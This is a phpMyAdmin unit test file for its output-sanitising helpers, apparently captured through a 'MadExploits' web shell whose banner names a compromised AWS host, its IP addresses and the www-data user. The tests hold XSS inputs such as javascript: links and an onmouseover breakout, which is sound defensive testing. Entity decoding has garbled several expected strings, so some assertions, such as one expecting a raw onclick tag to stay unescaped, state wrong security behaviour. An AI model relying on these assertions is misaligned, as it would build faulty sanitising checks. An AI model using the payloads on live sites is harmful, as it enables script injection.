Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 18.188.80.46
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Code Editor : SanitizeTest.php
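<?php

declare(strict_types=1);

namespace PhpMyAdmin\Tests;

use PhpMyAdmin\Sanitize;
use PHPUnit\Framework\Attributes\CoversClass;
use PHPUnit\Framework\Attributes\DataProvider;

/**
 * Unit tests for the output-sanitising helpers in {@see Sanitize}: BB-code
 * conversion, link allow-listing, filename sanitising, JavaScript value
 * formatting and request-variable filtering.
 *
 * NOTE(review): this listing was recovered from a rendered page and the
 * expected strings look as if HTML entities were decoded on the way (two
 * literals contained bare single quotes inside single-quoted strings, which
 * does not parse). Confirm every expected value that contains ', ", <, > or &
 * against the repository copy before relying on these assertions.
 */
#[CoversClass(Sanitize::class)]
class SanitizeTest extends AbstractTestCase
{
    /**
     * Sets up the fixture, for example, opens a network connection.
     * This method is called before a test is executed.
     */
    protected function setUp(): void
    {
        parent::setUp();

        $this->setLanguage();
    }

    /**
     * A javascript: URL inside [a@...] must not be turned into an anchor:
     * the opening tag is expected to stay as literal text.
     */
    public function testXssInHref(): void
    {
        // Written with double quotes so the literal parses; the characters are
        // exactly those shown in the listing.
        // NOTE(review): the quotes around XSS are presumably entity-encoded in
        // the real expectation - confirm.
        self::assertSame(
            "[a@javascript:alert('XSS');@target]link</a>",
            Sanitize::convertBBCode('[a@javascript:alert(\'XSS\');@target]link[/a]'),
        );
    }

    /**
     * An https link is expected to be rewritten to go through the
     * index.php?route=/url redirector, with the target URL percent-encoded.
     */
    public function testLink(): void
    {
        $lang = $GLOBALS['lang'];
        unset($GLOBALS['lang']);

        try {
            self::assertSame(
                '<a href="index.php?route=/url&url=https%3A%2F%2Fwww.phpmyadmin.net%2F" target="target">link</a>',
                Sanitize::convertBBCode('[a@https://www.phpmyadmin.net/@target]link[/a]'),
            );
        } finally {
            // Restore the global even when the assertion throws, so a failure
            // here does not leak altered state into later tests.
            $GLOBALS['lang'] = $lang;
        }
    }

    /**
     * Tests links to documentation.
     *
     * @param string $link     link
     * @param string $expected expected result
     */
    #[DataProvider('docLinks')]
    public function testDoc(string $link, string $expected): void
    {
        self::assertSame(
            '<a href="index.php?route=/url&url=https%3A%2F%2Fdocs.phpmyadmin.net%2Fen%2Flatest%2F'
                . $expected . '" target="documentation">doclink</a>',
            Sanitize::convertBBCode('[doc@' . $link . ']doclink[/doc]'),
        );
    }

    /**
     * Data provider for sanitize [doc@foo] markup
     *
     * Each row is [markup argument, expected percent-encoded page and anchor].
     *
     * @return mixed[]
     */
    public static function docLinks(): array
    {
        return [
            ['foo', 'setup.html%23foo'],
            ['cfg_TitleTable', 'config.html%23cfg_TitleTable'],
            ['faq3-11', 'faq.html%23faq3-11'],
            ['bookmarks@', 'bookmarks.html'],
        ];
    }

    /**
     * A link whose target attribute is not accepted must not become an
     * anchor; the opening tag stays as literal text.
     */
    public function testInvalidTarget(): void
    {
        self::assertSame(
            '[a@./Documentation.html@INVALID9]doc</a>',
            Sanitize::convertBBCode('[a@./Documentation.html@INVALID9]doc[/a]'),
        );
    }

    /**
     * An attempt to break out of the href attribute and add an event handler
     * after an otherwise valid link must leave the opening tag unconverted.
     */
    public function testLinkDocXss(): void
    {
        self::assertSame(
            '[a@./Documentation.html" onmouseover="alert(foo)"]doc</a>',
            Sanitize::convertBBCode('[a@./Documentation.html" onmouseover="alert(foo)"]doc[/a]'),
        );
    }

    /**
     * A valid link followed by a javascript: link: only the first one may be
     * converted, so one accepted link does not relax checking of the next.
     */
    public function testLinkAndXssInHref(): void
    {
        // Second literal uses double quotes so it parses; characters are those
        // shown in the listing.
        // NOTE(review): confirm the entity encoding of the quotes.
        self::assertSame(
            '<a href="index.php?route=/url&url=https%3A%2F%2Fdocs.phpmyadmin.net%2F">doc</a>'
                . "[a@javascript:alert('XSS');@target]link</a>",
            Sanitize::convertBBCode(
                '[a@https://docs.phpmyadmin.net/]doc[/a][a@javascript:alert(\'XSS\');@target]link[/a]',
            ),
        );
    }

    /**
     * Test escaping of HTML tags
     */
    public function testHtmlTags(): void
    {
        // NOTE(review): as listed, the expected value equals the input, which
        // would assert that no escaping happens. The expected string is
        // presumably the entity-encoded form of the tag - confirm.
        self::assertSame(
            '<div onclick="">',
            Sanitize::convertBBCode('<div onclick="">'),
        );
    }

    /**
     * Tests basic BB code.
     */
    public function testBBCode(): void
    {
        self::assertSame(
            '<strong>strong</strong>',
            Sanitize::convertBBCode('[strong]strong[/strong]'),
        );
    }

    /**
     * Test for Sanitize::sanitizeFilename
     */
    public function testSanitizeFilename(): void
    {
        self::assertSame(
            'File_name_123',
            Sanitize::sanitizeFilename('File_name 123'),
        );
    }

    /**
     * Test for Sanitize::getJsValue
     *
     * @param string                   $key      Key
     * @param string|bool|int|string[] $value    Value
     * @param string                   $expected Expected output
     */
    #[DataProvider('variables')]
    public function testGetJsValue(string $key, string|bool|int|array $value, string $expected): void
    {
        self::assertSame($expected, Sanitize::getJsValue($key, $value));
    }

    /**
     * Provider for testGetJsValue
     *
     * Each row is [key, value, expected JavaScript assignment]. The string
     * rows check that a double quote is backslash-escaped in the output while
     * an apostrophe is emitted unchanged.
     *
     * @return mixed[]
     */
    public static function variables(): array
    {
        return [
            ['foo', true, "foo = true;\n"],
            ['foo', false, "foo = false;\n"],
            ['foo', 100, "foo = 100;\n"],
            ['foo', 0, "foo = 0;\n"],
            ['foo', 'text', "foo = \"text\";\n"],
            ['foo', 'quote"', "foo = \"quote\\\"\";\n"],
            ['foo', 'apostroph\'', "foo = \"apostroph'\";\n"],
            ['foo', ['1', '2', '3'], "foo = [\"1\",\"2\",\"3\"];\n"],
            ['foo', 'bar"baz', "foo = \"bar\\\"baz\";\n"],
        ];
    }

    /**
     * Test for removeRequestVars
     */
    public function testRemoveRequestVars(): void
    {
        $GLOBALS['_POST'] = [];
        $_REQUEST['foo'] = 'bar';
        $_REQUEST['allow'] = 'all';
        $_REQUEST['second'] = 1;
        $allowList = ['allow', 'second'];

        Sanitize::removeRequestVars($allowList);

        // 'foo' is not on the allow list and must be gone.
        self::assertArrayNotHasKey('foo', $_REQUEST);
        // 'second' is allow-listed but holds an int rather than a string;
        // presumably non-string values are dropped as well - confirm against
        // Sanitize::removeRequestVars.
        self::assertArrayNotHasKey('second', $_REQUEST);
        self::assertArrayHasKey('allow', $_REQUEST);
    }

    /**
     * Data provider for sanitize links
     *
     * @return mixed[]
     */
    public static function dataProviderCheckLinks(): array
    {
        // Expected
        // The url
        // Allow http links
        // Allow other links
        return [
            // Local paths and script names.
            [false, 'foo', false, false],
            [true, './docs/html/', false, false],
            [false, 'index.php', false, false],
            [false, './index.php', false, false],
            [true, './index.php?', false, false],
            [true, './index.php?route=/server/sql', false, false],
            [false, 'index.php?route=/server/sql', false, false],
            // ftp: and mailto: pass only when "other" links are allowed.
            [false, 'ftp://ftp.example.com', false, false],
            [true, 'ftp://ftp.example.com', false, true],
            [false, 'mailto:admin@domain.tld', false, false],
            [true, 'mailto:admin@domain.tld', false, true],
            // Redirector links pass only with a percent-encoded target URL.
            [false, 'index.php?route=/url&url=https://example.com', false, false],
            [true, 'index.php?route=/url&url=https%3a%2f%2fexample.com', false, false],
            // https is always accepted; plain http only when explicitly allowed.
            [true, 'https://example.com', false, false],
            [false, 'http://example.com', false, false],
            [true, 'http://example.com', true, false],
        ];
    }

    /**
     * Tests link sanitize
     *
     * @param bool   $expected whether the link should be accepted
     * @param string $url      link under test
     * @param bool   $http     allow plain http links
     * @param bool   $other    allow other schemes (ftp, mailto in the data set)
     */
    #[DataProvider('dataProviderCheckLinks')]
    public function testCheckLink(bool $expected, string $url, bool $http, bool $other): void
    {
        self::assertSame(
            $expected,
            Sanitize::checkLink($url, $http, $other),
        );
    }
}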